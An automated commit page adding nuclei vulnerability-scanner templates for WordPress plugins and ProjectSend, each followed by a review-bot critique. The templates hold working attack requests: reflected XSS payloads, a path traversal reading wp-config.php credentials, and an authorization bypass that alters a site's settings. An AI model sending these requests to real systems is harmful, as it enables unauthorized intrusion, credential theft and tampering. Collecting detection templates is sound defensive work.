20241127
actions-user committed Nov 27, 2024
1 parent 89d6187 commit 6100788
Showing 289 changed files with 16,760 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241126
20241127
287 changes: 287 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

64 changes: 64 additions & 0 deletions poc/auth/projectsend-auth-bypass.yaml
@@ -0,0 +1,64 @@
id: projectsend-auth-bypass

info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: high
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
metadata:
verified: true
max-request: 1
fofa-query: body="ProjectSend"
shodan-query: html:"ProjectSend"
tags: misconfig,projectsend,auth-bypass

variables:
string: "{{randstr}}"

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true

extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true

- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}&section=general&this_install_title={{string}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "{{string}}")'
condition: and
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950
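Review bot: the `POST /options.php` request writes `this_install_title={{string}}` into the target's settings and nothing restores it, so a positive match leaves a random string as the installation title on every host scanned; add a cleanup request that restores the original title (it could be extracted from the first `GET /` response) or at least state the side effect in `description` and tag it accordingly. Also, `name` says `<= r1605` while `description` says `version r1605`; align them, and 'allows to execute arbitrary PHP code' should read 'allows execution of arbitrary PHP code'.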
59 changes: 59 additions & 0 deletions poc/aws/CVE-2024-52475-3edf4604484e3bad3394912718ccec2e.yaml
@@ -0,0 +1,59 @@
id: CVE-2024-52475-3edf4604484e3bad3394912718ccec2e

info:
name: >
Wawp < 3.0.18 - Unauthenticated Privilege Escalation
author: topscoder
severity: critical
description: >
The Wawp OTP Verification, Order Notifications, and Country Code Selector for WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to 3.0.18 (exclusive). This makes it possible for unauthenticated attackers to gain access to administrator accounts.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/da86d422-f0ef-439b-ae67-6cb9699073e0?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-52475
metadata:
fofa-query: "wp-content/plugins/automation-web-platform/"
google-query: inurl:"/wp-content/plugins/automation-web-platform/"
shodan-query: 'vuln:CVE-2024-52475'
tags: cve,wordpress,wp-plugin,automation-web-platform,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/automation-web-platform/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "automation-web-platform"
part: body

- type: dsl
dsl:
- compare_versions(version, '< 3.0.18')
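Review bot: the two `extractors` entries are identical apart from `internal: true` and both are named `version`, so one is redundant; keep a single extractor (drop `internal: true` if the version should be reported) since the `compare_versions` matcher only needs the variable to exist. Note also that the check rests solely on `Stable tag:` in `readme.txt`, which reflects the bundled readme rather than the running code, so expect false positives where the plugin was updated without its readme or the readme is served from a cache; the template never exercises the account-takeover path the description refers to, so a hit is a version indicator, not a confirmed vulnerability.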
59 changes: 59 additions & 0 deletions poc/config/wp-ispconfig3-787a6b689d770056f7efffb5964871d1.yaml
@@ -0,0 +1,59 @@
id: wp-ispconfig3-787a6b689d770056f7efffb5964871d1

info:
name: >
WP-ISPConfig 3 <= 1.5.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2813d6-6ef5-4629-b079-bec3ad25d661?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/wp-ispconfig3/"
google-query: inurl:"/wp-content/plugins/wp-ispconfig3/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,wp-ispconfig3,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/wp-ispconfig3/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "wp-ispconfig3"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.5.6')
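Review bot: `description: >` is followed immediately by `reference:` at the same indentation, so it yields an empty string, and `cvss-metrics`, `cvss-score` and `cve-id` are all null while `shodan-query: 'vuln:'` has no identifier after the colon; either fill these from the Wordfence advisory linked in `reference` or drop the empty keys, and remove the `cve` tag unless a CVE id is actually assigned. The duplicated `version` extractor has the same redundancy as the other topscoder template in this commit; one extractor is enough.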
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-4624-2080.yaml
@@ -0,0 +1,30 @@
id: CVE-2011-4624

info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
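Review bot: this template still uses the `requests:` key, which nuclei has deprecated in favour of `http:` (the ProjectSend and topscoder templates in this same commit already use `http:`); rename it so the template does not trip the deprecation warning in newer engine versions. `name` gives the version as `1.57` but `description` says `before 1.57`, so the name should read `< 1.57`, and `reference:` is a bare string here while the rest of the commit uses a list.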
29 changes: 29 additions & 0 deletions poc/cve/CVE-2011-5181-2112.yaml
@@ -0,0 +1,29 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2011-5181
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
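Review bot: `classification` carries only `cve-id`; the NVD entry in `reference` can supply the CVSS vector and score, and `cwe-id: CWE-79` applies to a reflected XSS, so add them for consistency with the CVE-2013-7240 and CVE-2014-4536 templates in this commit. The same `requests:` vs `http:` remark as for CVE-2011-4624 applies here.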
33 changes: 33 additions & 0 deletions poc/cve/CVE-2013-2287-2249.yaml
@@ -0,0 +1,33 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287
- https://www.dognaedis.com/vulns/DGS-SEC-16.html
classification:
cve-id: CVE-2013-2287
metadata:
google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
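Review bot: `description` names two injectable parameters, `notify` and `blog`, but the request only injects into `blog` (`notify=unnotif` is a fixed value), so the `notify` vector is never tested; either add a second path that probes `notify` with the same `document.domain` marker or narrow the description to what the template actually checks.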
36 changes: 36 additions & 0 deletions poc/cve/CVE-2013-7240-2289.yaml
@@ -0,0 +1,36 @@
id: CVE-2013-7240

info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'

matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and

- type: status
status:
- 200
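Review bot: with `condition: and` the matcher requires `The base configurations of the WordPress`, a comment string from the stock `wp-config.php` header, so an installation whose config was hand-written or stripped of comments is reported as not vulnerable even though the file was read; the three `DB_` constants are sufficient evidence and the comment line should be dropped. The fixed `../../../../` depth also assumes the plugin sits four directories below the WordPress root, which is the standard layout but not guaranteed. Minor: `cvss-metrics` uses `CVSS:3.0` while the other templates in this commit use 3.1.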
41 changes: 41 additions & 0 deletions poc/cve/CVE-2014-4536-2351.yaml
@@ -0,0 +1,41 @@
id: CVE-2014-4536

info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
tags: cve,cve2014,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200

# Enhanced by mp on 2022/02/24
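Review bot: the matcher string `"></script><script>alert(document.domain)</script>` does not occur verbatim in any of the three injected payloads: the `contactId` payload opens with a single quote (`'></script>...document.domain...`), and the `go` and `campaignId` payloads have no `</script>` prefix and use `document.cookie`, so the template only matches if the application rewrites the input. Use one consistent `document.domain` probe across all three parameters and match on exactly that. `name` also says `< 1.5.7` while `description` says `before 1.5.6`; check the changelog in `reference` and align them, and drop the stray trailing `&` from the path.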
27 changes: 27 additions & 0 deletions poc/cve/CVE-2015-6920-2583.yaml
@@ -0,0 +1,27 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
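Review bot: `description` only says the plugin 'suffers from a cross site scripting vulnerability' without naming the entry point; the request exercises the `wpbase` parameter of `js/window.php`, so say so, and add a `classification` block with `cve-id: CVE-2015-6920` (plus the CVSS data from the NVD link) to match the other CVE templates in this commit. The `requests:` key should be `http:`, as noted for the earlier daffainfo templates.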
0 comments on commit 6100788